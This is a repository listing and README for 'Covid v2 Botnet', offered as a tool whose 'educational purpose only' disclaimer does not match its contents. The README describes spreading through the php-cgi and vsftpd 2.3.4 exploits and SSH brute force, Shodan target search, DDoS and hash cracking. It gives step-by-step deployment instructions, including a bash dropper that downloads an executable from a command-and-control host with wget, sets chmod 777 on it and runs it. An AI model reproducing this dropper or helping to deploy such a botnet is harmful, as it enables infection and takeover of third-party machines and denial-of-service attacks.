======================: FILES :======================
Covid-v2-Botnet
├── attack_list.py
├── attack.py
├── BruteForceSSH.py
├── check_infected.py
├── client.py
├── DDOSAttack.py
├── gifs
│   ├── 1B477A4D-9C7F-4173-8911-4CBA80492C54.GIF
│   ├── 2518F02C-C205-4B92-A478-F97B7573475E.GIF
│   └── 3B4C1644-0690-4EAF-AA87-D2BB0C56800E.GIF
├── hash_identify.py
├── LICENSE.md
├── local_network_attack.py
├── PingScan.py
├── RCEs
│   ├── http_cgi_parm_exploit.py
│   ├── __init__.py
│   └── vsftpd_234_exploit.py
├── README.md
└── server.py

2 directories, 18 files
======================: README CONTENT :======================
# Covid v2 Botnet

***Disclamer: this botnet is for educational purpose only!***

**What can it do?**
- attack targets by a list
- attack targets on local network with a scanner
- spread through CVE-2012-1823 (php-cgi Argument Injection)
- spread through CVE-2011-2523 (vsftpd 2.3.4 backdoor)
- spread through SSH Brute Force
- search targets on shodan
- ddos spesific target (basic one with stop option)
- recognize a given hash and crack it using a word list
- save bots and targets lists into json file

![Botnet Help Command](gifs/1B477A4D-9C7F-4173-8911-4CBA80492C54.GIF)

**How to use?**

1. download the project

2. configure the cnc_ip on client.py and server.py

3. add shodan api token

4. create an installation file to make the target get infected and configure it on server.py and client.py
for example:

use a python compiler to compile client.py
create the bash script that downloads the compiled file and runs it:
```
#!/bin/bash
cnc_ip="your cnc"
executable="created executable with python compiler"
wordlist="your configured wordlist location"
wget http://$cnc_ip/$executable
wget http://$cnc_ip/$wordlist
chmod 777 $executable
./$executable
```
configure the bash file name under executable in server.py and client.py

5. run the server.py and attack your targets!

**Attack example:**

the attack is used on 3 local ips:
 
- 192.168.10.16 - Vunerable to CVE-2012-1823

- 192.168.10.18 - Vunerable to SSH Brute Force

- 192.168.10.20 - Vunerable to CVE-2011-2523

![Botnet Attack Example](gifs/3B4C1644-0690-4EAF-AA87-D2BB0C56800E.GIF)

**Hash cracking example**

the cracking is used on 3 infected bots and tries to crack md5 hash of "admin"

![Botnet Crack Hash Example](gifs/2518F02C-C205-4B92-A478-F97B7573475E.GIF)
====================== GIT HISTORY: ======================
a2d61e1 HEAD@{0}: clone: from https://github.com/1060275195/Covid-v2-Botnet
commit a2d61e1faea25b866439624dd2b05ad2805c8827
Author: dvir001 <39403717+dvir001@users.noreply.github.com>
Date:   Mon Jun 29 14:35:24 2020 +0300

    Update README.md

commit 836104ff87530e5211427e4057b64a7f95021851
Author: Daniel Zabelin <35328816+SniperX-D@users.noreply.github.com>
Date:   Sun Jun 28 21:07:12 2020 +0300

    Rename LICENSE,md to LICENSE.md

commit c97a86ee6c194c9f9bc967f6f4856f83c021a5d5
Merge: 4a40cb2 ea33737
Author: Daniel Zabelin <35328816+SniperX-D@users.noreply.github.com>
Date:   Sun Jun 28 14:06:48 2020 -0400

    Merge pull request #1 from SniperX-D/add-license-2
    
    Create LICENSE,md

commit ea3373741afb43693aa1e534cffc62e1de63b5bf
Author: Daniel Zabelin <35328816+SniperX-D@users.noreply.github.com>
Date:   Sun Jun 28 21:06:38 2020 +0300

    Create LICENSE,md

commit 4a40cb24c78a285b769fedd0cf2f7411c07ad88a
Author: SniperX-D <daniz432009@gmail.com>
Date:   Sun Jun 28 14:02:14 2020 -0400

    first commit
